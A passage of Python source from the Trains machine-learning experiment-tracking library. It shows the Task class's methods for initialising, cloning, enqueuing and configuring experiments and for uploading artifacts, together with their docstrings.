arguments. The dictionary keys are argparse variable names and the values are booleans.
The ``False`` value excludes the specified argument from the Task's parameter section.
Keys missing from the dictionary default to ``True``, and an empty dictionary defaults to ``False``.
For example:
.. code-block:: py
auto_connect_arg_parser={'do_not_include_me': False, }
.. note::
To manually connect an argparse, use :meth:`Task.connect`.
:param auto_connect_frameworks: Automatically connect frameworks? This includes patching MatplotLib, XGBoost,
scikit-learn, Keras callbacks, and TensorBoard/X to serialize plots, graphs, and the model location to
the **Trains Server** (backend), in addition to original output destination.
The values are:
- ``True`` - Automatically connect (default)
- ``False`` - Do not automatically connect
- A dictionary - In addition to a boolean, you can use a dictionary for fined grained control of connected
frameworks. The dictionary keys are frameworks and the values are booleans.
Keys missing from the dictionary default to ``True``, and an empty dictionary defaults to ``False``.
For example:
.. code-block:: py
auto_connect_frameworks={'matplotlib': True, 'tensorflow': True, 'pytorch': True,
'xgboost': True, 'scikit': True}
:param bool auto_resource_monitoring: Automatically create machine resource monitoring plots?
These plots appear in in the **Trains Web-App (UI)**, **RESULTS** tab, **SCALARS** sub-tab,
with a title of **:resource monitor:**.
The values are:
- ``True`` - Automatically create resource monitoring plots. (default)
- ``False`` - Do not automatically create.
:return: The main execution Task (Task context).
"""
def verify_defaults_match():
validate = [
('project name', project_name, cls.__main_task.get_project_name()),
('task name', task_name, cls.__main_task.name),
('task type', str(task_type), str(cls.__main_task.task_type)),
]
for field, default, current in validate:
if default is not None and default != current:
raise UsageError(
"Current task already created "
"and requested {field} '{default}' does not match current {field} '{current}'. "
"If you wish to create additional tasks use `Task.create`".format(
field=field,
default=default,
current=current,
)
)
if cls.__main_task is not None:
# if this is a subprocess, regardless of what the init was called for,
# we have to fix the main task hooks and stdout bindings
if cls.__forked_proc_main_pid != os.getpid() and cls.__is_subprocess():
if task_type is None:
task_type = cls.__main_task.task_type
# make sure we only do it once per process
cls.__forked_proc_main_pid = os.getpid()
# make sure we do not wait for the repo detect thread
cls.__main_task._detect_repo_async_thread = None
cls.__main_task._dev_worker = None
cls.__main_task._resource_monitor = None
# remove the logger from the previous process
logger = cls.__main_task.get_logger()
logger.set_flush_period(None)
# create a new logger (to catch stdout/err)
cls.__main_task._logger = None
cls.__main_task._reporter = None
cls.__main_task.get_logger()
cls.__main_task._artifacts_manager = Artifacts(cls.__main_task)
# unregister signal hooks, they cause subprocess to hang
# noinspection PyProtectedMember
cls.__main_task.__register_at_exit(cls.__main_task._at_exit)
# TODO: Check if the signal handler method is safe enough, for the time being, do not unhook
# cls.__main_task.__register_at_exit(None, only_remove_signal_and_exception_hooks=True)
if not running_remotely():
verify_defaults_match()
return cls.__main_task
is_sub_process_task_id = None
# check that we are not a child process, in that case do nothing.
# we should not get here unless this is Windows platform, all others support fork
if cls.__is_subprocess():
class _TaskStub(object):
def __call__(self, *args, **kwargs):
return self
def __getattr__(self, attr):
return self
def __setattr__(self, attr, val):
pass
is_sub_process_task_id = cls.__get_master_id_task_id()
# we could not find a task ID, revert to old stub behaviour
if not is_sub_process_task_id:
return _TaskStub()
elif running_remotely() and not get_is_master_node():
# make sure we only do it once per process
cls.__forked_proc_main_pid = os.getpid()
# make sure everyone understands we should act as if we are a subprocess (fake pid 1)
cls.__update_master_pid_task(pid=1, task=get_remote_task_id())
else:
# set us as master process (without task ID)
cls.__update_master_pid_task()
is_sub_process_task_id = None
if task_type is None:
# Backwards compatibility: if called from Task.current_task and task_type
# was not specified, keep legacy default value of TaskTypes.training
task_type = cls.TaskTypes.training
elif isinstance(task_type, six.string_types):
if task_type not in Task.TaskTypes.__members__:
raise ValueError("Task type '{}' not supported, options are: {}".format(
task_type, Task.TaskTypes.__members__.keys()))
task_type = Task.TaskTypes.__members__[str(task_type)]
try:
if not running_remotely():
# if this is the main process, create the task
if not is_sub_process_task_id:
task = cls._create_dev_task(
default_project_name=project_name,
default_task_name=task_name,
default_task_type=task_type,
reuse_last_task_id=reuse_last_task_id,
continue_last_task=continue_last_task,
detect_repo=False if (
isinstance(auto_connect_frameworks, dict) and
not auto_connect_frameworks.get('detect_repository', True)) else True
)
# set defaults
if output_uri:
task.output_uri = output_uri
elif cls.__default_output_uri:
task.output_uri = cls.__default_output_uri
# store new task ID
cls.__update_master_pid_task(task=task)
else:
# subprocess should get back the task info
task = Task.get_task(task_id=is_sub_process_task_id)
else:
# if this is the main process, create the task
if not is_sub_process_task_id:
task = cls(
private=cls.__create_protection,
task_id=get_remote_task_id(),
log_to_backend=False,
)
if cls.__default_output_uri and not task.output_uri:
task.output_uri = cls.__default_output_uri
# store new task ID
cls.__update_master_pid_task(task=task)
# make sure we are started
task.started(ignore_errors=True)
else:
# subprocess should get back the task info
task = Task.get_task(task_id=is_sub_process_task_id)
except Exception:
raise
else:
Task.__main_task = task
# register the main task for at exit hooks (there should only be one)
task.__register_at_exit(task._at_exit)
# patch OS forking
PatchOsFork.patch_fork()
if auto_connect_frameworks:
is_auto_connect_frameworks_bool = not isinstance(auto_connect_frameworks, dict)
if is_auto_connect_frameworks_bool or auto_connect_frameworks.get('scikit', True):
PatchedJoblib.update_current_task(task)
if is_auto_connect_frameworks_bool or auto_connect_frameworks.get('matplotlib', True):
PatchedMatplotlib.update_current_task(Task.__main_task)
if is_auto_connect_frameworks_bool or auto_connect_frameworks.get('tensorflow', True):
PatchAbsl.update_current_task(Task.__main_task)
TensorflowBinding.update_current_task(task)
if is_auto_connect_frameworks_bool or auto_connect_frameworks.get('pytorch', True):
PatchPyTorchModelIO.update_current_task(task)
if is_auto_connect_frameworks_bool or auto_connect_frameworks.get('xgboost', True):
PatchXGBoostModelIO.update_current_task(task)
if is_auto_connect_frameworks_bool or auto_connect_frameworks.get('fastai', True):
PatchFastai.update_current_task(task)
if auto_resource_monitoring and not is_sub_process_task_id:
task._resource_monitor = ResourceMonitor(
task, report_mem_used_per_process=not config.get(
'development.worker.report_global_mem_used', False))
task._resource_monitor.start()
# make sure all random generators are initialized with new seed
make_deterministic(task.get_random_seed())
if auto_connect_arg_parser:
EnvironmentBind.update_current_task(Task.__main_task)
# Patch ArgParser to be aware of the current task
argparser_update_currenttask(Task.__main_task)
# set excluded arguments
if isinstance(auto_connect_arg_parser, dict):
task._arguments.exclude_parser_args(auto_connect_arg_parser)
# Check if parse args already called. If so, sync task parameters with parser
if argparser_parseargs_called():
for parser, parsed_args in get_argparser_last_args():
task._connect_argparse(parser=parser, parsed_args=parsed_args)
elif argparser_parseargs_called():
# actually we have nothing to do, in remote running, the argparser will ignore
# all non argparser parameters, only caveat if parameter connected with the same name
# as the argparser this will be solved once sections are introduced to parameters
pass
# Make sure we start the logger, it will patch the main logging object and pipe all output
# if we are running locally and using development mode worker, we will pipe all stdout to logger.
# The logger will automatically take care of all patching (we just need to make sure to initialize it)
logger = task.get_logger()
# show the debug metrics page in the log, it is very convenient
if not is_sub_process_task_id:
logger.report_text(
'TRAINS results page: {}'.format(task.get_output_log_web_page()),
)
# Make sure we start the dev worker if required, otherwise it will only be started when we write
# something to the log.
task._dev_mode_task_start()
return task
@classmethod
def create(cls, project_name=None, task_name=None, task_type=TaskTypes.training):
# type: (Optional[str], Optional[str], Task.TaskTypes) -> Task
"""
Create a new, non-reproducible Task (experiment). This is called a sub-task.
.. note::
This method always creates a new, non-reproducible Task. To create a reproducible Task, call the
:meth:`Task.init` method. To reference another Task, call the :meth:`Task.get_task` method .
:param str project_name: The name of the project in which the experiment will be created.
If ``project_name`` is ``None``, and the main execution Task is initialized (see :meth:`Task.init`),
then the main execution Task's project is used. Otherwise, if the project does
not exist, it is created. (Optional)
:param str task_name: The name of Task (experiment).
:param TaskTypes task_type: The task type.
Valid task types:
- ``TaskTypes.training`` (default)
- ``TaskTypes.testing``
- ``TaskTypes.inference``
- ``TaskTypes.data_processing``
- ``TaskTypes.application``
- ``TaskTypes.monitor``
- ``TaskTypes.controller``
- ``TaskTypes.optimizer``
- ``TaskTypes.service``
- ``TaskTypes.qc``
- ``TaskTypes.custom``
:return: A new experiment.
"""
if not project_name:
if not cls.__main_task:
raise ValueError("Please provide project_name, no global task context found "
"(Task.current_task hasn't been called)")
project_name = cls.__main_task.get_project_name()
try:
task = cls(
private=cls.__create_protection,
project_name=project_name,
task_name=task_name,
task_type=task_type,
log_to_backend=False,
force_create=True,
)
except Exception:
raise
return task
@classmethod
def get_task(cls, task_id=None, project_name=None, task_name=None):
# type: (Optional[str], Optional[str], Optional[str]) -> Task
"""
Get a Task by Id, or project name / task name combination.
For example:
The following code demonstrates calling ``Task.get_task`` to report a scalar to another Task. The output
of :meth:`.Logger.report_scalar` from testing is associated with the Task named ``training``. It allows
training and testing to run concurrently, because they initialized different Tasks (see :meth:`Task.init`
for information about initializing Tasks).
The training script:
.. code-block:: py
# initialize the training Task
task = Task.init('myProject', 'training')
# do some training
The testing script:
.. code-block:: py
# initialize the testing Task
task = Task.init('myProject', 'testing')
# get the training Task
train_task = Task.get_task(project_name='myProject', task_name='training')
# report metrics in the training Task
for x in range(10):
train_task.get_logger().report_scalar('title', 'series', value=x * 2, iteration=x)
:param str task_id: The Id (system UUID) of the experiment to get.
If specified, ``project_name`` and ``task_name`` are ignored.
:param str project_name: The project name of the Task to get.
:param str task_name: The name of the Task within ``project_name`` to get.
:return: The Task specified by ID, or project name / experiment name combination.
"""
return cls.__get_task(task_id=task_id, project_name=project_name, task_name=task_name)
@classmethod
def get_tasks(cls, task_ids=None, project_name=None, task_name=None, task_filter=None):
# type: (Optional[Sequence[str]], Optional[str], Optional[str], Optional[Dict]) -> Sequence[Task]
"""
Get a list of Tasks by one of the following:
- A list of specific Task IDs.
- All Tasks in a project matching a full or partial Task name.
- All Tasks in any project matching a full or partial Task name.
:param list(str) task_ids: The Ids (system UUID) of experiments to get.
If ``task_ids`` specified, then ``project_name`` and ``task_name`` are ignored.
:param str project_name: The project name of the Tasks to get. To get the experiment
in all projects, use the default value of ``None``. (Optional)
:param str task_name: The full name or partial name of the Tasks to match within the specified
``project_name`` (or all projects if ``project_name`` is ``None``).
This method supports regular expressions for name matching. (Optional)
:param list(str) task_ids: list of unique task id string (if exists other parameters are ignored)
:param str project_name: project name (str) the task belongs to (use None for all projects)
:param str task_name: task name (str) in within the selected project
Return any partial match of task_name, regular expressions matching is also supported
If None is passed, returns all tasks within the project
:param dict task_filter: filter and order Tasks. See service.tasks.GetAllRequest for details
:return: The Tasks specified by the parameter combinations (see the parameters).
"""
return cls.__get_tasks(task_ids=task_ids, project_name=project_name,
task_name=task_name, **(task_filter or {}))
@property
def output_uri(self):
# type: () -> str
return self.storage_uri
@output_uri.setter
def output_uri(self, value):
# type: (str) -> None
# check if we have the correct packages / configuration
if value and value != self.storage_uri:
from .storage.helper import StorageHelper
helper = StorageHelper.get(value)
if not helper:
raise ValueError("Could not get access credentials for '{}' "
", check configuration file ~/trains.conf".format(value))
helper.check_write_permissions(value)
self.storage_uri = value
@property
def artifacts(self):
# type: () -> Dict[str, Artifact]
"""
A read-only dictionary of Task artifacts (name, artifact).
:return: The artifacts.
"""
if not Session.check_min_api_version('2.3'):
return ReadOnlyDict()
artifacts_pairs = []
if self.data.execution and self.data.execution.artifacts:
artifacts_pairs = [(a.key, Artifact(a)) for a in self.data.execution.artifacts]
if self._artifacts_manager:
artifacts_pairs += list(self._artifacts_manager.registered_artifacts.items())
return ReadOnlyDict(artifacts_pairs)
@property
def models(self):
# type: () -> Dict[str, Sequence[Model]]
"""
Read-only dictionary of the Task's loaded/stored models
:return: A dictionary of models loaded/stored {'input': list(Model), 'output': list(Model)}.
"""
return self.get_models()
@classmethod
def clone(
cls,
source_task=None, # type: Optional[Union[Task, str]]
name=None, # type: Optional[str]
comment=None, # type: Optional[str]
parent=None, # type: Optional[str]
project=None, # type: Optional[str]
):
# type: (...) -> Task
"""
Create a duplicate (a clone) of a Task (experiment). The status of the cloned Task is ``Draft``
and modifiable.
Use this method to manage experiments and for autoML.
:param str source_task: The Task to clone. Specify a Task object or a Task ID. (Optional)
:param str name: The name of the new cloned Task. (Optional)
:param str comment: A comment / description for the new cloned Task. (Optional)
:param str parent: The Id of the parent Task of the new Task.
- If ``parent`` is not specified, then ``parent`` is set to ``source_task.parent``.
- If ``parent`` is not specified and ``source_task.parent`` is not available, then
``parent`` set to to ``source_task``.
:param str project: The Id of the project in which to create the new Task.
If ``None``, the new task inherits the original Task's project. (Optional)
:return: The new cloned Task (experiment).
"""
assert isinstance(source_task, (six.string_types, Task))
if not Session.check_min_api_version('2.4'):
raise ValueError("Trains-server does not support DevOps features, "
"upgrade trains-server to 0.12.0 or above")
task_id = source_task if isinstance(source_task, six.string_types) else source_task.id
if not parent:
if isinstance(source_task, six.string_types):
source_task = cls.get_task(task_id=source_task)
parent = source_task.id if not source_task.parent else source_task.parent
elif isinstance(parent, Task):
parent = parent.id
cloned_task_id = cls._clone_task(cloned_task_id=task_id, name=name, comment=comment,
parent=parent, project=project)
cloned_task = cls.get_task(task_id=cloned_task_id)
return cloned_task
@classmethod
def enqueue(cls, task, queue_name=None, queue_id=None):
# type: (Union[Task, str], Optional[str], Optional[str]) -> Any
"""
Enqueue a Task for execution, by adding it to an execution queue.
.. note::
A worker daemon must be listening at the queue for the worker to fetch the Task and execute it,
see `Use Case Examples <../trains_agent_ref/#use-case-examples>`_ on the "Trains Agent
Reference page.
:param Task/str task: The Task to enqueue. Specify a Task object or Task ID.
:param str queue_name: The name of the queue. If not specified, then ``queue_id`` must be specified.
:param str queue_id: The Id of the queue. If not specified, then ``queue_name`` must be specified.
:return: An enqueue JSON response.
.. code-block:: javascript
{
"queued": 1,
"updated": 1,
"fields": {
"status": "queued",
"status_reason": "",
"status_message": "",
"status_changed": "2020-02-24T15:05:35.426770+00:00",
"last_update": "2020-02-24T15:05:35.426770+00:00",
"execution.queue": "2bd96ab2d9e54b578cc2fb195e52c7cf"
}
}
- ``queued`` - The number of Tasks enqueued (an integer or ``null``).
- ``updated`` - The number of Tasks updated (an integer or ``null``).
- ``fields``
- ``status`` - The status of the experiment.
- ``status_reason`` - The reason for the last status change.
- ``status_message`` - Information about the status.
- ``status_changed`` - The last status change date and time (ISO 8601 format).
- ``last_update`` - The last Task update time, including Task creation, update, change, or events for
this task (ISO 8601 format).
- ``execution.queue`` - The Id of the queue where the Task is enqueued. ``null`` indicates not enqueued.
"""
assert isinstance(task, (six.string_types, Task))
if not Session.check_min_api_version('2.4'):
raise ValueError("Trains-server does not support DevOps features, "
"upgrade trains-server to 0.12.0 or above")
# make sure we have wither name ot id
mutually_exclusive(queue_name=queue_name, queue_id=queue_id)
task_id = task if isinstance(task, six.string_types) else task.id
session = cls._get_default_session()
if not queue_id:
req = queues.GetAllRequest(name=exact_match_regex(queue_name), only_fields=["id"])
res = cls._send(session=session, req=req)
if not res.response.queues:
raise ValueError('Could not find queue named "{}"'.format(queue_name))
queue_id = res.response.queues[0].id
if len(res.response.queues) > 1:
LoggerRoot.get_base_logger().info("Multiple queues with name={}, selecting queue id={}".format(
queue_name, queue_id))
req = tasks.EnqueueRequest(task=task_id, queue=queue_id)
res = cls._send(session=session, req=req)
resp = res.response
return resp
@classmethod
def dequeue(cls, task):
# type: (Union[Task, str]) -> Any
"""
Dequeue (remove) a Task from an execution queue.
:param Task/str task: The Task to dequeue. Specify a Task object or Task ID.
:return: A dequeue JSON response.
.. code-block:: javascript
{
"dequeued": 1,
"updated": 1,
"fields": {
"status": "created",
"status_reason": "",
"status_message": "",
"status_changed": "2020-02-24T16:43:43.057320+00:00",
"last_update": "2020-02-24T16:43:43.057320+00:00",
"execution.queue": null
}
}
- ``dequeued`` - The number of Tasks enqueued (an integer or ``null``).
- ``fields``
- ``status`` - The status of the experiment.
- ``status_reason`` - The reason for the last status change.
- ``status_message`` - Information about the status.
- ``status_changed`` - The last status change date and time in ISO 8601 format.
- ``last_update`` - The last time the Task was created, updated,
changed or events for this task were reported.
- ``execution.queue`` - The Id of the queue where the Task is enqueued. ``null`` indicates not enqueued.
- ``updated`` - The number of Tasks updated (an integer or ``null``).
"""
assert isinstance(task, (six.string_types, Task))
if not Session.check_min_api_version('2.4'):
raise ValueError("Trains-server does not support DevOps features, "
"upgrade trains-server to 0.12.0 or above")
task_id = task if isinstance(task, six.string_types) else task.id
session = cls._get_default_session()
req = tasks.DequeueRequest(task=task_id)
res = cls._send(session=session, req=req)
resp = res.response
return resp
def add_tags(self, tags):
# type: (Union[Sequence[str], str]) -> None
"""
Add Tags to this task. Old tags are not deleted. When executing a Task (experiment) remotely,
this method has no effect).
:param tags: A list of tags which describe the Task to add.
"""
if not running_remotely() or not self.is_main_task():
if isinstance(tags, six.string_types):
tags = tags.split(" ")
self.data.tags.extend(tags)
self._edit(tags=list(set(self.data.tags)))
def connect(self, mutable):
# type: (Any) -> Any
"""
Connect an object to a Task object. This connects an experiment component (part of an experiment) to the
experiment. For example, connect hyperparameters or models.
:param object mutable: The experiment component to connect. The object can be any object Task supports
integrating, including:
- argparse - An argparse object for parameters.
- dict - A dictionary for parameters.
- TaskParameters - A TaskParameters object.
- model - A model object for initial model warmup, or for model update/snapshot uploading.
:return: The result returned when connecting the object, if supported.
:raise: Raise an exception on unsupported objects.
"""
dispatch = (
(OutputModel, self._connect_output_model),
(InputModel, self._connect_input_model),
(ArgumentParser, self._connect_argparse),
(dict, self._connect_dictionary),
(TaskParameters, self._connect_task_parameters),
)
for mutable_type, method in dispatch:
if isinstance(mutable, mutable_type):
return method(mutable)
raise Exception('Unsupported mutable type %s: no connect function found' % type(mutable).__name__)
def connect_configuration(self, configuration):
# type: (Union[Mapping, Path, str]) -> Union[Mapping, Path, str]
"""
Connect a configuration dictionary or configuration file (pathlib.Path / str) to a Task object.
This method should be called before reading the configuration file.
Later, when creating an output model, the model will include the contents of the configuration dictionary
or file.
For example, a local file:
.. code-block:: py
config_file = task.connect_configuration(config_file)
my_params = json.load(open(config_file,'rt'))
A parameter dictionary:
.. code-block:: py
my_params = task.connect_configuration(my_params)
:param configuration: The configuration. This is usually the configuration used in the model training process.
Specify one of the following:
- A dictionary - A dictionary containing the configuration. Trains stores the configuration in
the **Trains Server** (backend), in a HOCON format (JSON-like format) which is editable.
- A ``pathlib2.Path`` string - A path to the configuration file. Trains stores the content of the file.
A local path must be relative path. When executing a Task remotely in a worker, the contents brought
from the **Trains Server** (backend) overwrites the contents of the file.
:return: If a dictionary is specified, then a dictionary is returned. If pathlib2.Path / string is
specified, then a path to a local configuration file is returned. Configuration object.
"""
if not isinstance(configuration, (dict, Path, six.string_types)):
raise ValueError("connect_configuration supports `dict`, `str` and 'Path' types, "
"{} is not supported".format(type(configuration)))
# parameter dictionary
if isinstance(configuration, dict):
def _update_config_dict(task, config_dict):
# noinspection PyProtectedMember
task._set_model_config(config_dict=config_dict)
if not running_remotely() or not self.is_main_task():
self._set_model_config(config_dict=configuration)
configuration = ProxyDictPostWrite(self, _update_config_dict, **configuration)
else:
configuration.clear()
configuration.update(self._get_model_config_dict())
configuration = ProxyDictPreWrite(False, False, **configuration)
return configuration
# it is a path to a local file
if not running_remotely() or not self.is_main_task():
# check if not absolute path
configuration_path = Path(configuration)
if not configuration_path.is_file():
ValueError("Configuration file does not exist")
try:
with open(configuration_path.as_posix(), 'rt') as f:
configuration_text = f.read()
except Exception:
raise ValueError("Could not connect configuration file {}, file could not be read".format(
configuration_path.as_posix()))
self._set_model_config(config_text=configuration_text)
return configuration
else:
configuration_text = self._get_model_config_text()
configuration_path = Path(configuration)
fd, local_filename = mkstemp(prefix='trains_task_config_',
suffix=configuration_path.suffixes[-1] if
configuration_path.suffixes else '.txt')
os.write(fd, configuration_text.encode('utf-8'))
os.close(fd)
return Path(local_filename) if isinstance(configuration, Path) else local_filename
def connect_label_enumeration(self, enumeration):
# type: (Dict[str, int]) -> Dict[str, int]
"""
Connect a label enumeration dictionary to a Task (experiment) object.
Later, when creating an output model, the model will include the label enumeration dictionary.
:param dict enumeration: A label enumeration dictionary of string (label) to integer (value) pairs.
For example:
.. code-block:: javascript
{
'background': 0,
'person': 1
}
:return: The label enumeration dictionary (JSON).
"""
if not isinstance(enumeration, dict):
raise ValueError("connect_label_enumeration supports only `dict` type, "
"{} is not supported".format(type(enumeration)))
if not running_remotely() or not self.is_main_task():
self.set_model_label_enumeration(enumeration)
else:
# pop everything
enumeration.clear()
enumeration.update(self.get_labels_enumeration())
return enumeration
def get_logger(self):
# type: () -> Logger
"""
Get a Logger object for reporting, for this task context. You can view all Logger report output associated with
the Task for which this method is called, including metrics, plots, text, tables, and images, in the
**Trains Web-App (UI)**.
:return: The Logger for the Task (experiment).
"""
return self._get_logger()
def mark_started(self, force=False):
# type: (bool) -> ()
"""
Manually mark a Task as started (happens automatically)
:param bool force: If True the task status will be changed to `started` regardless of the current Task state.
"""
# UI won't let us see metrics if we're not started
self.started(force=force)
self.reload()
def mark_stopped(self, force=False):
# type: (bool) -> ()
"""
Manually mark a Task as stopped (also used in :meth:`_at_exit`)
:param bool force: If True the task status will be changed to `stopped` regardless of the current Task state.
"""
# flush any outstanding logs
self.flush(wait_for_uploads=True)
# mark task as stopped
self.stopped(force=force)
def flush(self, wait_for_uploads=False):
# type: (bool) -> bool
"""
Flush any outstanding reports or console logs.
:param bool wait_for_uploads: Wait for all outstanding uploads to complete before existing the flush?
- ``True`` - Wait
- ``False`` - Do not wait (default)
"""
# make sure model upload is done
if BackendModel.get_num_results() > 0 and wait_for_uploads:
BackendModel.wait_for_results()
# flush any outstanding logs
if self._logger:
# noinspection PyProtectedMember
self._logger._flush_stdout_handler()
if self._reporter:
self.reporter.flush()
LoggerRoot.flush()
return True
def reset(self, set_started_on_success=False, force=False):
# type: (bool, bool) -> None
"""
Reset a Task. Trains reloads a Task after a successful reset.
When a worker executes a Task remotely, the Task does not reset unless
the ``force`` parameter is set to ``True`` (this avoids accidentally clearing logs and metrics).
:param bool set_started_on_success: If successful, automatically set the Task to started?
- ``True`` - If successful, set to started.
- ``False`` - If successful, do not set to started. (default)
:param bool force: Force a Task reset, even when executing the Task (experiment) remotely in a worker?
- ``True`` - Force
- ``False`` - Do not force (default)
"""
if not running_remotely() or not self.is_main_task() or force:
super(Task, self).reset(set_started_on_success=set_started_on_success)
def close(self):
"""
Close the current Task. Enables you to manually shutdown the task.
.. warning::
Only call :meth:`Task.close` if you are certain the Task is not needed.
"""
if self._at_exit_called:
return
# store is main before we call at_exit, because will will Null it
is_main = self.is_main_task()
# wait for repository detection (5 minutes should be reasonable time to detect all packages)
if self._logger and not self.__is_subprocess():
self._wait_for_repo_detection(timeout=300.)
self.__shutdown()
# unregister atexit callbacks and signal hooks, if we are the main task
if is_main:
self.__register_at_exit(None)
def register_artifact(self, name, artifact, metadata=None, uniqueness_columns=True):
# type: (str, pandas.DataFrame, Dict, Union[bool, Sequence[str]]) -> None
"""
Register (add) an artifact for the current Task. Registered artifacts are dynamically sychronized with the
**Trains Server** (backend). If a registered artifact is updated, the update is stored in the
**Trains Server** (backend). Registered artifacts are primarily used for Data Audition.
The currently supported registered artifact object type is a pandas.DataFrame.
See also :meth:`Task.unregister_artifact` and :meth:`Task.get_registered_artifacts`.
.. note::
Trains also supports uploaded artifacts which are one-time uploads of static artifacts that are not
dynamically sychronized with the **Trains Server** (backend). These static artifacts include
additional object types. For more information, see :meth:`Task.upload_artifact`.
:param str name: The name of the artifact.
.. warning::
If an artifact with the same name was previously registered, it is overwritten.
:param object artifact: The artifact object.
:param dict metadata: A dictionary of key-value pairs for any metadata. This dictionary appears with the
experiment in the **Trains Web-App (UI)**, **ARTIFACTS** tab.
:param uniqueness_columns: A Sequence of columns for artifact uniqueness comparison criteria, or the default
value of ``True``. If ``True``, the artifact uniqueness comparison criteria is all the columns,
which is the same as ``artifact.columns``.
"""
if not isinstance(uniqueness_columns, CollectionsSequence) and uniqueness_columns is not True:
raise ValueError('uniqueness_columns should be a List (sequence) or True')
if isinstance(uniqueness_columns, str):
uniqueness_columns = [uniqueness_columns]
self._artifacts_manager.register_artifact(
name=name, artifact=artifact, metadata=metadata, uniqueness_columns=uniqueness_columns)
def unregister_artifact(self, name):
# type: (str) -> None
"""
Unregister (remove) a registered artifact. This removes the artifact from the watch list that Trains uses
to synchronize artifacts with the **Trains Server** (backend).
.. important::
- Calling this method does not remove the artifact from a Task. It only stops Trains from
monitoring the artifact.
- When this method is called, Trains immediately takes the last snapshot of the artifact.
"""
self._artifacts_manager.unregister_artifact(name=name)
def get_registered_artifacts(self):
# type: () -> Dict[str, Artifact]
"""
Get a dictionary containing the Task's registered (dynamically synchronized) artifacts (name, artifact object).
.. note::
After calling ``get_registered_artifacts``, you can still modify the registered artifacts.
:return: The registered (dynamically synchronized) artifacts.
"""
return self._artifacts_manager.registered_artifacts
def upload_artifact(
self,
name, # type: str
artifact_object, # type: Union[str, Mapping, pandas.DataFrame, numpy.ndarray, Image.Image, Any]
metadata=None, # type: Optional[Mapping]
delete_after_upload=False, # type: bool
auto_pickle=True, # type: bool
):
# type: (...) -> bool
"""
Upload (add) a static artifact to a Task object. The artifact is uploaded in the background.
The currently supported upload (static) artifact types include:
- string / pathlib2.Path - A path to artifact file. If a wildcard or a folder is specified, then Trains
creates and uploads a ZIP file.
- dict - Trains stores a dictionary as ``.json`` file and uploads it.
- pandas.DataFrame - Trains stores a pandas.DataFrame as ``.csv.gz`` (compressed CSV) file and uploads it.
- numpy.ndarray - Trains stores a numpy.ndarray as ``.npz`` file and uploads it.
- PIL.Image - Trains stores a PIL.Image as ``.png`` file and uploads it.
- Any - If called with auto_pickle=True, the object will be pickled and uploaded.
:param str name: The artifact name.
.. warning::
If an artifact with the same name was previously uploaded, then it is overwritten.
:param object artifact_object: The artifact object.
:param dict metadata: A dictionary of key-value pairs for any metadata. This dictionary appears with the
experiment in the **Trains Web-App (UI)**, **ARTIFACTS** tab.
:param bool delete_after_upload: After the upload, delete the local copy of the artifact?
- ``True`` - Delete the local copy of the artifact.
- ``False`` - Do not delete. (default)
:param bool auto_pickle: If True (default) and the artifact_object is not one of the following types:
pathlib2.Path, dict, pandas.DataFrame, numpy.ndarray, PIL.Image, url (string), local_file (string)
the artifact_object will be pickled and uploaded as pickle file artifact (with file extension .pkl)
:return: The status of the upload.
- ``True`` - Upload succeeded.
- ``False`` - Upload failed.
:raise: If the artifact object type is not supported, raise a ``ValueError``.
"""
return self._artifacts_manager.upload_artifact(
name=name, artifact_object=artifact_object, metadata=metadata,
delete_after_upload=delete_after_upload, auto_pickle=auto_pickle)
def get_models(self):
# type: () -> Dict[str, Sequence[Model]]
"""
Return a dictionary with {'input': [], 'output': []} loaded/stored models of the current Task
Input models are files loaded in the task, either manually or automatically logged
Output models are files stored in the task, either manually or automatically logged
Automatically logged frameworks are for example: TensorFlow, Keras, PyTorch, ScikitLearn(joblib) etc.
:return: A dictionary with keys input/output, each is list of Model objects.
Example:
.. code-block:: py
{'input': [trains.Model()], 'output': [trains.Model()]}
"""
task_models = {'input': self._get_models(model_type='input'),
'output': self._get_models(model_type='output')}
return task_models
def is_current_task(self):
# type: () -> bool
"""
.. deprecated:: 0.13.0
This method is deprecated. Use :meth:`Task.is_main_task` instead.
Is this Task object the main execution Task (initially returned by :meth:`Task.init`)?
:return: Is this Task object the main execution Task?
- ``True`` - Is the main execution Task.
- ``False`` - Is not the main execution Task.
"""
return self.is_main_task()
def is_main_task(self):
# type: () -> bool
"""
Is this Task object the main execution Task (initially returned by :meth:`Task.init`)?
.. note::
If :meth:`Task.init` was never called, this method will *not* create
it, making this test more efficient than:
.. code-block:: py
Task.init() == task
:return: Is this Task object the main execution Task?
- ``True`` - Is the main execution Task.
- ``False`` - Is not the main execution Task.
"""
return self is self.__main_task
def set_model_config(self, config_text=None, config_dict=None):
# type: (Optional[str], Optional[Mapping]) -> None
"""
.. deprecated:: 0.14.1
Use :meth:`Task.connect_configuration` instead.
"""
self._set_model_config(config_text=config_text, config_dict=config_dict)
def get_model_config_text(self):
# type: () -> str
"""
.. deprecated:: 0.14.1
Use :meth:`Task.connect_configuration` instead.
"""
return self._get_model_config_text()
def get_model_config_dict(self):
# type: () -> Dict
"""
.. deprecated:: 0.14.1
Use :meth:`Task.connect_configuration` instead.
"""
return self._get_model_config_dict()
def set_model_label_enumeration(self, enumeration=None):
# type: (Optional[Mapping[str, int]]) -> ()
"""
Set the label enumeration for the Task object before creating an output model.
Later, when creating an output model, the model will inherit these properties.
:param dict enumeration: A label enumeration dictionary of string (label) to integer (value) pairs.
For example:
.. code-block:: javascript
{
'background': 0,
'person': 1
}
"""
super(Task, self).set_model_label_enumeration(enumeration=enumeration)
def get_last_iteration(self):
# type: () -> int
"""
Get the last reported iteration, which is the last iteration for which the Task reported a metric.
.. note::
The maximum reported iteration is not in the local cache. This method
sends a request to the **Trains Server** (backend).
:return: The last reported iteration number.
"""
self._reload_last_iteration()
return max(self.data.last_iteration, self._reporter.max_iteration if self._reporter else 0)
def set_initial_iteration(self, offset=0):
# type: (int) -> int
"""
Set initial iteration, instead of zero. Useful when continuing training from previous checkpoints
:param int offset: Initial iteration (at starting point)
:return: Newly set initial offset.
"""
return super(Task, self).set_initial_iteration(offset=offset)
def get_initial_iteration(self):
# type: () -> int
"""
Return the initial iteration offset, default is 0
Useful when continuing training from previous checkpoints
:return: Initial iteration offset.
"""
return super(Task, self).get_initial_iteration()
def get_last_scalar_metrics(self):
# type: () -> Dict[str, Dict[str, Dict[str, float]]]
"""
Get the last scalar metrics which the Task reported. This is a nested dictionary, ordered by title and series.
For example:
.. code-block:: javascript
{
'title': {
'series': {
'last': 0.5,
'min': 0.1,
'max': 0.9
}
}
}
:return: The last scalar metrics.
"""
self.reload()
metrics = self.data.last_metrics
scalar_metrics = dict()
for i in metrics.values():
for j in i.values():
scalar_metrics.setdefault(j['metric'], {}).setdefault(
